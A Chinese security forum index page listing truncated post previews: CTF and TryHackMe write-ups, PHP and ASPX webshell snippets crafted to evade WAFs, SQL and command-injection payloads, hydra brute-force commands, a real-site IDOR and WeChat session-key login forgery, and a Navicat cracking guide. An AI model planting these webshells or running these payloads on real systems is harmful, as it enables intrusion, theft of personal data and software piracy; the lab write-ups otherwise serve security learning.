跳转到帖子

红队攻击面相关讨论

ISHACK聚集了大量的黑客技术爱好者和安全研究人员。渗透测试、木马分析、应急响应、红队工具、逆向破解、代码审计、爬虫技术、在这裡你可以探讨黑客攻防技术相关的所有话题。

  1. 巡风简介 巡风是一款适用于企业内网的漏洞快速应急、巡航扫描系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。其主体分为两部分:网络资产识别引擎与漏洞检测引擎。 网络资产识别引擎会通过用户配置的IP范围定期自动的进行端口探测(支持调用MASSCAN),并进行指纹识别,识别内容包括:服务类型、组件容器、脚本语言、CMS。 漏洞检测引擎会根据用户指定的任务规则进行定期或者一次性的漏洞检测,其支持2种插件类型、标示符与脚本,均可通过web控制台进行添加。(转自https://github.com/ysrc/xunfeng) 安装Ubuntu就不说了,说下国内的比较快的源吧,省的网速不好,只能干等 Ubuntu 17.04的开发代号是Zesty Zapus,以下是Ubuntu 17.04网易源: sudo nano /etc/apt/source.list deb http://mirrors.163.com/ubuntu/ zesty main restricted universe multiverse deb http://mirrors.163.com/ubuntu/ zesty-security main restricted universe multiverse deb http://mirrors.163.com/ubuntu/ zesty-updates main restricted universe multiverse deb http://mi…

    • 0 篇回复
    • 34 次查看
  2. 关于使用xsl的webshell以前已经有人发过了,比如aspx的一个webshell如下: <%@ Page Language="C#" Debug="true" %> <%@ import Namespace="System.IO"%> <%@ import Namespace="System.Xml"%> <%@ import Namespace="System.Xml.Xsl"%> <% string xml=@"<?xml version=""1.0""?><root>test</root>"; string xslt=@"<?xml version='1.0'?> <xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh""> <msxsl:script language=""JScript"" implements-prefix=""zcg""> <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c56193…

    • 0 篇回复
    • 32 次查看
  3. 下载地址: 开源地址: https://github.com/m0l1ce/wooyunallbugs 百度网盘: 链接: http://pan.baidu.com/s/1nvkFKox 密码: 94sp 安装步骤: 1.首先下载一个集成环境工具,这里我用的 phpStudy2016. 下载地址:phpStudy 2016.11.03 再次更新,支持自定义php版本 2.然后解压到我的D盘上 3.把源码和数据库先下载到本地,图片用的是外连,人家也说了,放图片的服务器不会关掉的 4.把 bugs.rar 这个源码包解压到了D:\phpStudy\WWW\bugs\ 下 5.在源码里找见 conn.php 这个文件,用记事本打开,或者用notepad++ 打开,在里面修改成自己 MySQL 数据库的账号密码 。 6.然后把 wooyun.rar 拷贝到D:\phpStudy\MySQL\data 这里解压下,这里是数据库存放的地方。 7.启动 phpstudy ,然后点击面板上的选择版本,看下是不是 5.3 版本的,如果不是就选择到这个 5.3 版本 。(昨天就这个版本问题,害的我一连不上数据库。。。) 8.点击 mysql 管理器,站点域名管理,然后该杂弄杂弄。。。 9.一般到这里就结束了,直接启动服务器,然后然后输入 127.0.0.1 就能进入了主页面了。 10.先修改一个小错误,再继续说说其他的。他的源码不知道杂回事,…

    • 0 篇回复
    • 21 次查看
  4. 0×01 姿势一 我们知道PHP动态函数很有意思,那么你猜到了,姿势一就是: <?php$_POST['xx']($_POST['oo']);?> 注意XX参数设置成EVAL是不行的哦,让我们来看看效果: 0×02 姿势二 关键词是过滤了,但是你老是交一些奇奇怪怪的东西,人家几万块买的WAF也不是吃白饭的啊。好好好你丑你说什么都是对的,我们不交了,getallheaders函数能够获取请求头内容,来试试新家伙: <?phpeval(getallheaders()['Accept-Language']);> 当然你要是猥琐到这样,那恭喜你,你已经学会举一反三了... <?php$a=getallheaders()['xxx'];$a(getallheaders()['ooo']);> 0×03 姿势三 遇到一般的waf可能上个姿势就能绕过,但是还是会有一些臭不要脸的waf会检测http请求头里的内容,咱们还是从技术角度出发来看看这个问题怎么绕过,猥琐的人可能首先想到了的base64,更猥琐的人可能想到了各种自写函数进行编码,替换,但是我见过最猥琐的思路是gzuncompress和gzcompress函数,话不多说我们先放壳: <?phpeval(gzuncompress(base64_decode(getallheaders()['xx'])));> http头部的里面的xx字段看起来像base64编码(其实实他就是base64编…

    • 0 篇回复
    • 33 次查看
  5. 引入 来自于5.16提交的某edu站的漏洞,所有隐私信息均打码发布,只分享思路, 漏洞1:未授权访问 填写信息 之后查看申请记录 此时可得到/api/applyInfo/getListById接口 构造数据包(POC在圈内) 遍历ID接口可获得大量的Openid和个人信息及身份证号 未授权访问*1 返回结果: 得到身份证信息等相关信息,记录openid 以下以40209的openid为例 未授权访问*2 再次点击入校申请: 得到/api/applyInfo/getListByUser接口 用openid遍历/api/applyInfo/getListByUser也可未授权访问大量身份证,姓名等信息 未授权访问*2 返回结果: 文件上传(此洞edu不收,但可以作为一个思路) 再次点击入校申请 上传接口未对白名单进行有效鉴别 导致部分后缀如txt和js可以上传到服务器里并成功解析 得到接口/api/upload/fileUpload 构造数据包 Js成功上传 访问成功上传的js路径: 成功访问 成功访问 如不对相关后缀进行拦截,用户可以上传大量JS内容并成功在外部引用消耗服务器资源 构造引用接口 <!DO…

    • 0 篇回复
    • 37 次查看
  6. sessionkey引入 微信sessionkey是微信小程序开发中用于标识用户会话的一串密钥。当用户在微信小程序中进行登录操作时,微信服务器会返回一个session_key,开发者可以使用这个session_key来获取用户的身份信息或进行加密通信. 如果sessionkey泄露就可以进行获取用户信息,伪造登录. 师傅404Xyunxi就是通过sessionkey打的 拿到了江西财经大学的证书 [5.20]提交的某edusrc平台案例 此次案例就是通过sessionkey泄露达到伪造登录的 期中此次信息搜集的骚操作方法来自师傅404Xyunxi,收益匪浅 伪造登录工具:Wx_SessionKey_crypt 发现漏洞一:sessionkey泄露 点击登录 抓取数据包 微信session key泄露 伪造登录需要手机号 从抖音信息搜集到手机号 在抖音搜索相关平台信息,得到泄露的手机号 得到私人手机号187291***** 伪造登录 1.先解密自己的: 2.在伪加密替换成他的 替换encrypetdData,成功伪造登录 每次替换的时候encryptedData和iv都会改变,所以每次的包都不同,这里就不提供数据包了 发现漏洞二:逻辑缺陷 使用自己的手机号再次点击登录 无法登录 此…

    • 0 篇回复
    • 35 次查看
  7. 前言 Web89 intval取整数 就跟python中的int一样 这里是只要有0-9就输出nonono 但是还需要是传出去是整数 所以我们用数组绕过 Web90 intval($var,$base),其中var必填,base可选,这里base=0,则表示根据var开始的数字决定使用的进制: 0x或0X开头使用十六进制,0开头使用八进制,否则使用十进制。 这里是0开头 说明是根据开始的数字决定使用的进制 这里用的是八进制十六进制绕过 加0是告诉服务器这是八进制 如果转换成十六进制需要加0x Web91 不想打字了,感觉WP里给的说的好全面 i忽略大小写 m多行模式 我们只要让我们的参数里含有php即可 payload:cmd?=111%0aphp 或者cmd?=php%0aggg Web92 这里与web90的不同之处就在于等号了 ===表示类型和数值必须相等 ==是值相等就可以类型不一定相等 我们知道强制转换如果是小数部分的话会舍弃小数部分直接构造小数 Web93 不解释直接秒 Web94 查一下strpos用法 这里说明我们得含有0 但不能在开头,因为开头告诉服务器使用几进制 Web95 过滤了.八进制起手 +或者空格绕过最后一个限制 W…

    • 0 篇回复
    • 23 次查看
  8. 前言 直接冲 Web29 error_reporting(0)先忽略错误 isset检查是否传参 传参c参数 如果匹配没有flag(i的意思是忽略大小写) 就可以执行eval函数,eval函数就不必介绍了吧 方法一: 使用tac读取文件 %20经过url编码是空格 *是匹配fla后所有的文件 ?c=system("tac%20fla*"); 方法二: 把flag.php里的文件内容复制到别处 ?c=system("cp fla*.php a.txt"); url编码后 ?c=system("cp%20fla*.php%20a.txt"); Web30 过滤了flag system以及php 并且忽略大小写 方法一: 忽略system可以用` ` 代替system进行执行命令 以及使用?进行占位 ?c=`cp fla?.??? 1.txt`; 当然用*也是可以的 方法二:、 使用passthru代替system执行命令 ?c=passthru("tac%20fla*"); Web31 过滤的更多了 过滤了flag system php cat sort shell 还有. 空格 以及单引号 单引号双引号等需要搭配\进行转义 方法一: 用…

    • 0 篇回复
    • 17 次查看
  9. 前言 好,开冲了 Web41 过滤了0-9 a-z ~ + $[]{}-\等 使用的是post请求 这里直接用脚本 脚本的路径也附上 https://blog.csdn.net/miuzzx/article/details/108569080 把php脚本和python脚本放到一起 <?php $myfile = fopen("rce_or.txt", "w"); $contents=""; for ($i=0; $i < 256; $i++) { for ($j=0; $j <256 ; $j++) { if($i<16){ $hex_i='0'.dechex($i); } else{ $hex_i=dechex($i); } if($j<16){ $hex_j='0'.dechex($j); } else{ $hex_j=dechex($j); } $preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i'; if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){ echo ""; } else{ $a='%'.$hex_i; $b='%'.$hex_j; $…

    • 0 篇回复
    • 24 次查看
  10. 前言 好,继续冲 Web53 过滤了很多,默认system输入的是返回值而不是结果值 ?c=ta''c${IFS}fla?.php Web54 过滤很多 tac被过滤了 但是cp和mv都没被过滤 ?c=cp${IFS}fla?.php${IFS}t.txt Web55(熟悉掌握三种方法) 看似过滤的少,实际上砍到大动脉了 因为过滤了a-z 方法一: 我们可以用来把flag.php的内容转为base64并且进行解码 过滤了a-z我们之间?代替 数字没被禁数字之外的用?等价代替 我们的命令本来是?c=/bin/base64 flag.php 转换后则是 ?c=/???/????64 ????.??? 解码即出 方法二: 还有一种做法,就是使用 /usr/bin/bzip2 进行对文件的压缩 ?c=/???/???/????2 ????.??? 然后 最后访问 /flag.php.bz2进行下载压缩包 方法三: 这个方法最逆天了 我们知道在linux中./你的文件名.后缀 是可以执行脚本文件的 然而这个靶没有过滤.和/ 我们就可以上传文件进行执行 制作一个POST表单 我们知道php上传文件会临时储存在/tmp/phpXXXXX里大都是时一共是八位数000 …

    • 0 篇回复
    • 16 次查看
  11. 前言 靶场地址:https://ctf.show/challenges 如果此时此刻还没burpsuite可以用开盒即用版的(域这里用的就是 最新BurpSuite2023专业汉化版下载(无需任何配置) 2年前29106110 Web21 这里进行抓包 这里可以看到他是通过Base64进行编码的 选择狙击手模式 密码字典下载他们给我们用的字典 我们要对admin:后的密码进行爆破所以需要截取一下 添加前缀 进行base64编码 url取消打勾(这里要进行base64编码 =会造成编码失败 Web22 Web22ctfshow挂了 Web23 打开一看 分析一下 这里包含了一个flag.php 需要满足条件输出 这里是isset是检查是否get传参token这个参数,如果传参了就进入if里 下一步将传参…

    • 0 篇回复
    • 35 次查看
  12. 前言 接上回章节 Web25 没想到都是随机种子的爆破… 传入r用0-随机生成的种子 如果设置的cookie等于第二次和第三次随机种子之和则输出flag 下载Php随机种子爆破包https://www.openwall.com/php_mt_seed/php_mt_seed-4.0.tar.gz 编译一下 如果出错了在前面需要加#include <sys/times.h>头文件 make #编译 先给他随机传参 检查一下php版本是7.1+ 我们找个7.1+版本 编写脚本(注意这个种子可能需要爆破多次,所以这里只是提供一个方法)我尝试多个种子爆破 <?php mt_srand(1064029812); echo mt_rand()."\n"; $result = mt_rand()+mt_rand(); echo $result; ?> 我们复制第二次的种子 这里cookie传入的token需要是第一次和第二次的种子之和 我们使用我们的cookie-Editor进行写入token 下一步进行传参r进入循环 Web26 打开一看需要安装 这里数据库的信息CTFshow都给我们了 但是连接是失败的所以需要爆破 需…

    • 0 篇回复
    • 17 次查看
  13. 前言 一些zip进行加密密码之后不一定是真的有密码 这时候如果我们去爆破那就是上当了 打金盾的时候就上当了,跟我随行打的朋友解出来了,我还在傻傻的爆破 拿到只有一个zip且有flag一定要先看二进制 下载打开后发现有密码 如果此时此刻不先看二进制文件先去爆破就是上当了 一个zip文件有三个部分组成: 压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 (详解链接) 这是三个头标记,主要看第二个 压缩源文件数据区:50 4B 03 04这是头文件标记 压缩源文件目录区: 50 4B 01 02:目录中文件文件头标记 3F 00:压缩使用的 pkware 版本 14 00:解压文件所需 pkware 版本 00 00:全局方式位标记(有无加密,这个更改这里进行伪加密,改为09 00打开就会提示有密码了) 压缩源文件目录结束标志 :50 4B 05 06:目录结束标记 我们用winhex打开压缩包,搜索504B,点击第二个504B(压缩源文件目录区) 09->00 此时我们在打开就可以直接打开 Zip伪加密解密一把梭脚本: https://wwi.lanzoup.com/iQ34I1lusn1a 使用方法也简单 中文名字会不成功 需要改压缩包名字 java -jar ZipCenOp.jar r ctfs…

    • 0 篇回复
    • 14 次查看
  14. 发帖人 ISHACK AI BOT

    前言 继上篇文章 [HGAME]2024 WEEK1 writeup笔记 1年前0115717 Web有两道题没做出来 都有关java的 一个js混淆 一个是java的rce没做出来 在寒假的目标是肯定能开到java的不少内容的 2048*16 这道题太亏了,因为我见过很多题都是js泄露flag而且打过几场ctf都是泄露的 这次没有发现出来好难受 简单来说我们需要玩到32768分才能拿到flag 正常玩的话得玩个好久,但听用脚本挂的还是修改js的到32768也拿不到flag 我也尝试用脚本挂了 只不过那个脚本算力不强到五千分都算是顶尖了 js在浏览器查看不方便在线格式化一下 Javascript Deobfuscator (willnode.github.io) 最后在500多行发现了一个base64 在600多行又发现一个base64 翻阅后面代码无明显加密,判断突破点就在这两个base64 最后是换表bas…

    • 0 篇回复
    • 16 次查看
  15. 前言 29号开始的 31号域开始打,打了一天到2月1 WEEK1就卡瓶颈了 整个参赛人数接近2千,写笔记记录一下一些脚本和解题思路 注:本文章在比赛结束前已开启文章密码保护,未泄露解题思路,比赛结束后正式开放文章 ->Web方向 冲 Bypass it 点击注册 尝试burpsuite爆破无果,题目说不让禁用js 但那是迷惑人的,最后禁用js就可以注册成功 禁用后注册即可 注册成功直接登录就能拿到flag ez http 打开后发现需要添加refrer头跟进访问此网站 Burpsuite开盒即用中文版: 最新BurpSuite2023专业汉化版下载(无需任何配置) 2年前29106110 抓包发送到重放器里面,且添加头部文件 让后这里说需要添加ua标识 直接复制在改上去 有实战渗透的的操作了(出的题就是好!,因为一些学校的edu还有公司网站的后…

    • 0 篇回复
    • 28 次查看
  16. 发帖人 ISHACK AI BOT

    前言 百万美元三血 AK WEB RE MISC方向 ->Web方向 一个池子? 猜测SSTI 验证一下 确定为ssti漏洞 出的题很简单, 自从某场比赛ssti绕waf了一夜绕了出来,就再也没有难的ssti了 这题都不用手注 fenjing梭了……. python -m fenjing crack -u http://node1.anna.nssctf.cn:28187/echo --method POST --inputs input --interval 0.01 百万美元的诱惑 三血 经典的绕过a不等于b 但a的md5必须和b的md5一样 比赛已经出现过很多次这样的题了 ?a=QNKCDZO&b=s878926199a 下面一个c用2025e绕过 整体payload ?a=QNKCDZO&b=s878926199a&c=2025e 进入dollar.php 无数字无字母构造12 这里使用$(())构造 某show的相似题具体分析过程可看 …

    • 0 篇回复
    • 23 次查看
  17. 前言 Navicat可能是Mysql必备的工具了,不过域还是建议具备一些网站开发经验才能更好的学习. 其次今天不发Thm靶场,水一下文章 发一些之前用的工具的破解教程(抱歉 介绍一下Navicat Navicat Premium 是一套可创建多个连接的数据库开发工具,让你从单一应用程序中同时连接 MySQL、Redis、MariaDB、MongoDB、SQL Server、Oracle、PostgreSQL 和 SQLite 。它与 GaussDB 、OceanBase 数据库及 Amazon RDS、Amazon Aurora、Amazon Redshift、Amazon ElastiCache、Microsoft Azure、Oracle Cloud、MongoDB Atlas、Redis Enterprise Cloud、阿里云、腾讯云和华为云等云数据库兼容。你可以快速轻松地创建、管理和维护数据库。 但是Navicat是需要破解的,不然只能用14天接下来教大家如何破解 破解激活教程 先在官方下载Navicat Navicat | 下载 Navicat Premium 14 天免费 Windows、macOS 和 Linux 的试用版 破解软件下载地址NavicatCracker.exe_免费高速下载|百度网盘-分享无限制 (baidu.com) 破解思路: 把破解软件放到Navicat文件夹中 让后关闭防火墙和网络 全…

    • 0 篇回复
    • 26 次查看
  18. 发帖人 ISHACK AI BOT

    前言 细讲SQL注入 [SWPUCTF 2021 新生赛]sql 既让sqlmap工具跑不出来,又让手注不是很难,题出的很用心 地址:[SWPUCTF 2021 新生赛]sql | NSSCTF 用到的知识 确定注入参数 字符型 判断闭合符号 如上是单引号 判断回显位置 发现waf 空格被过滤 –+被过滤 绕空格过滤的方法 %09,/**/ 绕过–+注释符的方法: %23(#) 查询回显位置 ?wllm=1'order%09by%092%23 ?wllm=1'order/**/by/**/3%23 两个回显位置 判断列数 1'order/**/by/**/3%23 发现3列正常回显 4列报错 使用select一样的效果 说明一共有三列 查询数据库 -1'union/**/select/**/1,database(),3%23 数据库为test_db 查询表名 这里的前置知识在mysql里information_schema里包含了所有的数据名表名列名 其中information_schema.tables里包含了所有的表 group_concat…

    • 0 篇回复
    • 28 次查看
  19. 前言 /usr/sbin/souurces-media-unmount 未能在600s内完成 昨天没有认真打靶场,在此深刻反思自己,是因为在搞一些其他东西 如果你不幸和我卡百分之九十一,尝试去搜索引擎上搜索,是没有任何解决办法的,别问,问就是试过了 搜索引擎上一共有两个答案:一个是注释配置文件,一个是杀死进程 可以明确的说,都不管用 关于Parror 我一直都在用kali linux但是听,Parror比kali linux好用,今日一上手感觉不错. 我硬盘一直不够,所以就没用 但是就在昨天我终于狠心删除了陪伴我一个暑假的PUBG腾出来一些内存安装Parror,现在电脑上基本没游戏了 呜呜呜等我升级完硬盘在下回来 总之她挺好的 踩坑一天的解决方法 一句话: 安装前换apt源,我换的是清华的apt源 这样就安装成功了 另外再次感谢我亲爱的昔日Thm国区第一的群主

    • 0 篇回复
    • 40 次查看
  20. 比赛信息 比赛名称:SHCTF-“山河”网络安全技能挑战赛 比赛平台:山河CTF 参赛对象:齐鲁工业大学、西安邮电大学、广东海洋大学、长春工程学院、郑州轻工业大学、河南大学、齐鲁师范学院、陕西邮电职业技术学院、陕西工业职业技术学院、商丘师范学院、咸阳师范学院 (排名不分先后)等十余所高校参与 比赛时间:2023-10-02 ~ 2023.10.29 协办单位:山东汉任信息安全技术有限公司,吉林谛听信息技术有限公司 题目详解 [WEEK1] ez_asm 拿到题目之后,从题目名字中的”asm”可以看出,这是一道考察汇编语言的题目,我们要有一定的汇编语言基础。下载下来可以看到给了我们一个txt文本,那么这里面一定是汇编块。打开之后确实是汇编块。 那么接下来就是 找到右上方的(x)用小手点击一下鼠标左键 哐哐一顿分析啦,详细的分解步骤就不多说了,这里涉及到汇编语言的知识,我简单解释一下它的逻辑: 这段汇编代码的功能是对一个字符串(flag)进行加密处理,然后输出加密后的结果。具体的操作步骤如下: 首先,定义一个变量var_4,用来存储字符串的索引,初始值为0。 然后,进入一个循环,对字符串的每个字符进行两次异或和减法操作,具体如下: 将var_4作为偏移量,从flag中取出一个字符,与16进制数0x1E异或,得到新的字符。 将新的字符存回flag中覆盖原来的字符。 再次从flag中取出同一个字符,减去16进制数0x0A,得…

    • 0 篇回复
    • 28 次查看
  21. 前言 比较基础,打一遍更好理解原理和巩固基础 子域的话推荐fofa以及奇安信方便一些 也有子域名爆破工具 IDOR的话引进入门也挺好的 https://tryhackme.com/room/subdomainenumeration https://tryhackme.com/room/idor 没事刷刷榜,沉淀沉淀准备刷漏洞盒子的公益SRC的榜单了 笔记 IDOR未授权访问

    • 0 篇回复
    • 23 次查看
  22. 前言 房间地址:https://tryhackme.com/room/cowboyhacker 你在酒吧里不断地吹嘘你的精英黑客技能,一些赏金猎人决定接受你的索赔!证明您的地位不仅仅是在酒吧喝几杯。我感觉到你的未来是青椒和牛肉! 实战 靶机地址:10.10.178.87 kali启动 扫描 nmap -A -sC 10.10.178.87 扫描结果 如下 查看提示: 访问网站看看他们给了什么 查一下翻译快一点 ,虽然域大致能看懂 看出来这些用户名都不像是要攻击的对象 所以我们需要以匿名登录FTP ftp 10.10.178.87 #用户名 anonymous 有两个文件 我们拿下来看看 如果有passive拦截就先退出 输入passive关闭安全拦截 好的都拿下了 上面的那个是lock.txt 看出来好像是个密码 我们打开task.txt看一下 可以看到我们的ssh用户应该是lin 所以我们需要用九头蛇去爆破他 hydra -t 50 -l lin -P locks.txt -vV 10.10.178.87 ssh 出来了 ssh [email protected] 让我们先拿一个user.txt fl…

    • 0 篇回复
    • 25 次查看
  23. 前言 房间地址:https://tryhackme.com/room/gallery666 本次可以学习到非常多的知识,包括SQL注入,文件上传漏洞,Rce漏洞命令执行,Kali-linux中searchsploit数据库里漏洞脚本的利用,加固Shell以及使用国外脚本梭哈提权. 实战 靶机地址:10.10.171.124 nmap -A -sC 10.10.171.124 两个端口进入8080后是 Cms系统如题目 Simple Image Gallery 用kali自带的searchsploit漏洞查询工具查询一下这个系统的漏洞 searchsploit Simple Image Gallery Sql injection翻译过来就是SQL注入 而且给了传入参数是ID 以’闭合 直接Sign in 传马 还是用冰蝎吧 我喜欢直接用冰蝎反弹shell 但是冰蝎有点傻b 但是我反弹之后一会儿就会断 好烦 这两个傻b软件 所以我们还是回归最原始的shell 用的是我之前文章的shell 发现连了还是断 最后还是用了一句话木马 通过看橘墨的直播我也看他们也是用一句话 才发现shell在吊打靶场不如先一句话方便 我也尝试…

    • 0 篇回复
    • 30 次查看
  24. 前言 房间地址:https://tryhackme.com/room/hackpark 使用 Hydra 暴力破解网站登录,识别并使用公共漏洞,然后升级您在此 Windows 计算机上的权限! 建站不一定需要linux(实际上市场上大部分都是linux,本次要打的靶场是用win建站,我们通过的网站漏洞打进Windows主机 看到是人入侵Windows 使用到了MSF,看经典好像是当年的永恒之蓝漏洞 实战 靶机地址:10.10.201.235 Hackpark的引入 小丑回魂里的,我虽然没看过这个电影,但是刷过片段,还行,这里只是一个小丑,其实我也是小丑 有个联系,预测可能有XSS注入, 这里有个登录,那就是爆破了 我们看下 第一题: 九头蛇爆破账号密码 让后看第二题 Hydra 确实有很多功能,并且有许多可用的“模块”(模块的一个示例是我们上面使用的http-post-form )。 然而,这个工具不仅适用于暴力破解 HTTP 表单,还适用于其他协议,如 FTP、SSH、SMTP、SMB 等。 下面是一个迷你备忘单: 命令描述Hydra -P <单词列表> -v <ip> <协议>对您选择的协议进行暴力破解Hydra -v -V -u -L <用户名列表> -P <密码列表> -t 1…

    • 0 篇回复
    • 32 次查看
  25. 前言 房间地址:https://tryhackme.com/room/ignite 一家新成立的公司的网络服务器存在一些问题。 此次我将用Parror hack系统作为攻击机器 实战 靶机地址:10.10.178.214 先给咱的系统升一下root 吐槽一下Thm的VPN 有点拉胯 说明咱们连接不上他们的内网VPN 后来修了修,连上了好了我们开扫 开放了80端口 查看源代码 先登录上再说 可以看见直接文件上传漏洞 在上传之前我们先搜索一下Fuel CMS的漏洞 刚用Parror没有搜到Fuel CMS的漏洞 就用kali搜 漏洞其实还不少… 不过在此使用他们的漏洞我觉得不如自己上传shell 这里看到我们准备的shell 是不行的 所以我们只能用漏洞库的脚本shell了 这里看看他们的用法 在这里试一下 不过我们还是去kali或者parror那里去运行脚本 这里我更换了一个靶机地址:因为老是断 服了 我一怒之下给我的kali和parror都上了”魔法” 我们继续:分析一下脚本的使用方法 使用脚本: python3 50477.py -u http://10.10.234.58 开启监听: …

    • 0 篇回复
    • 33 次查看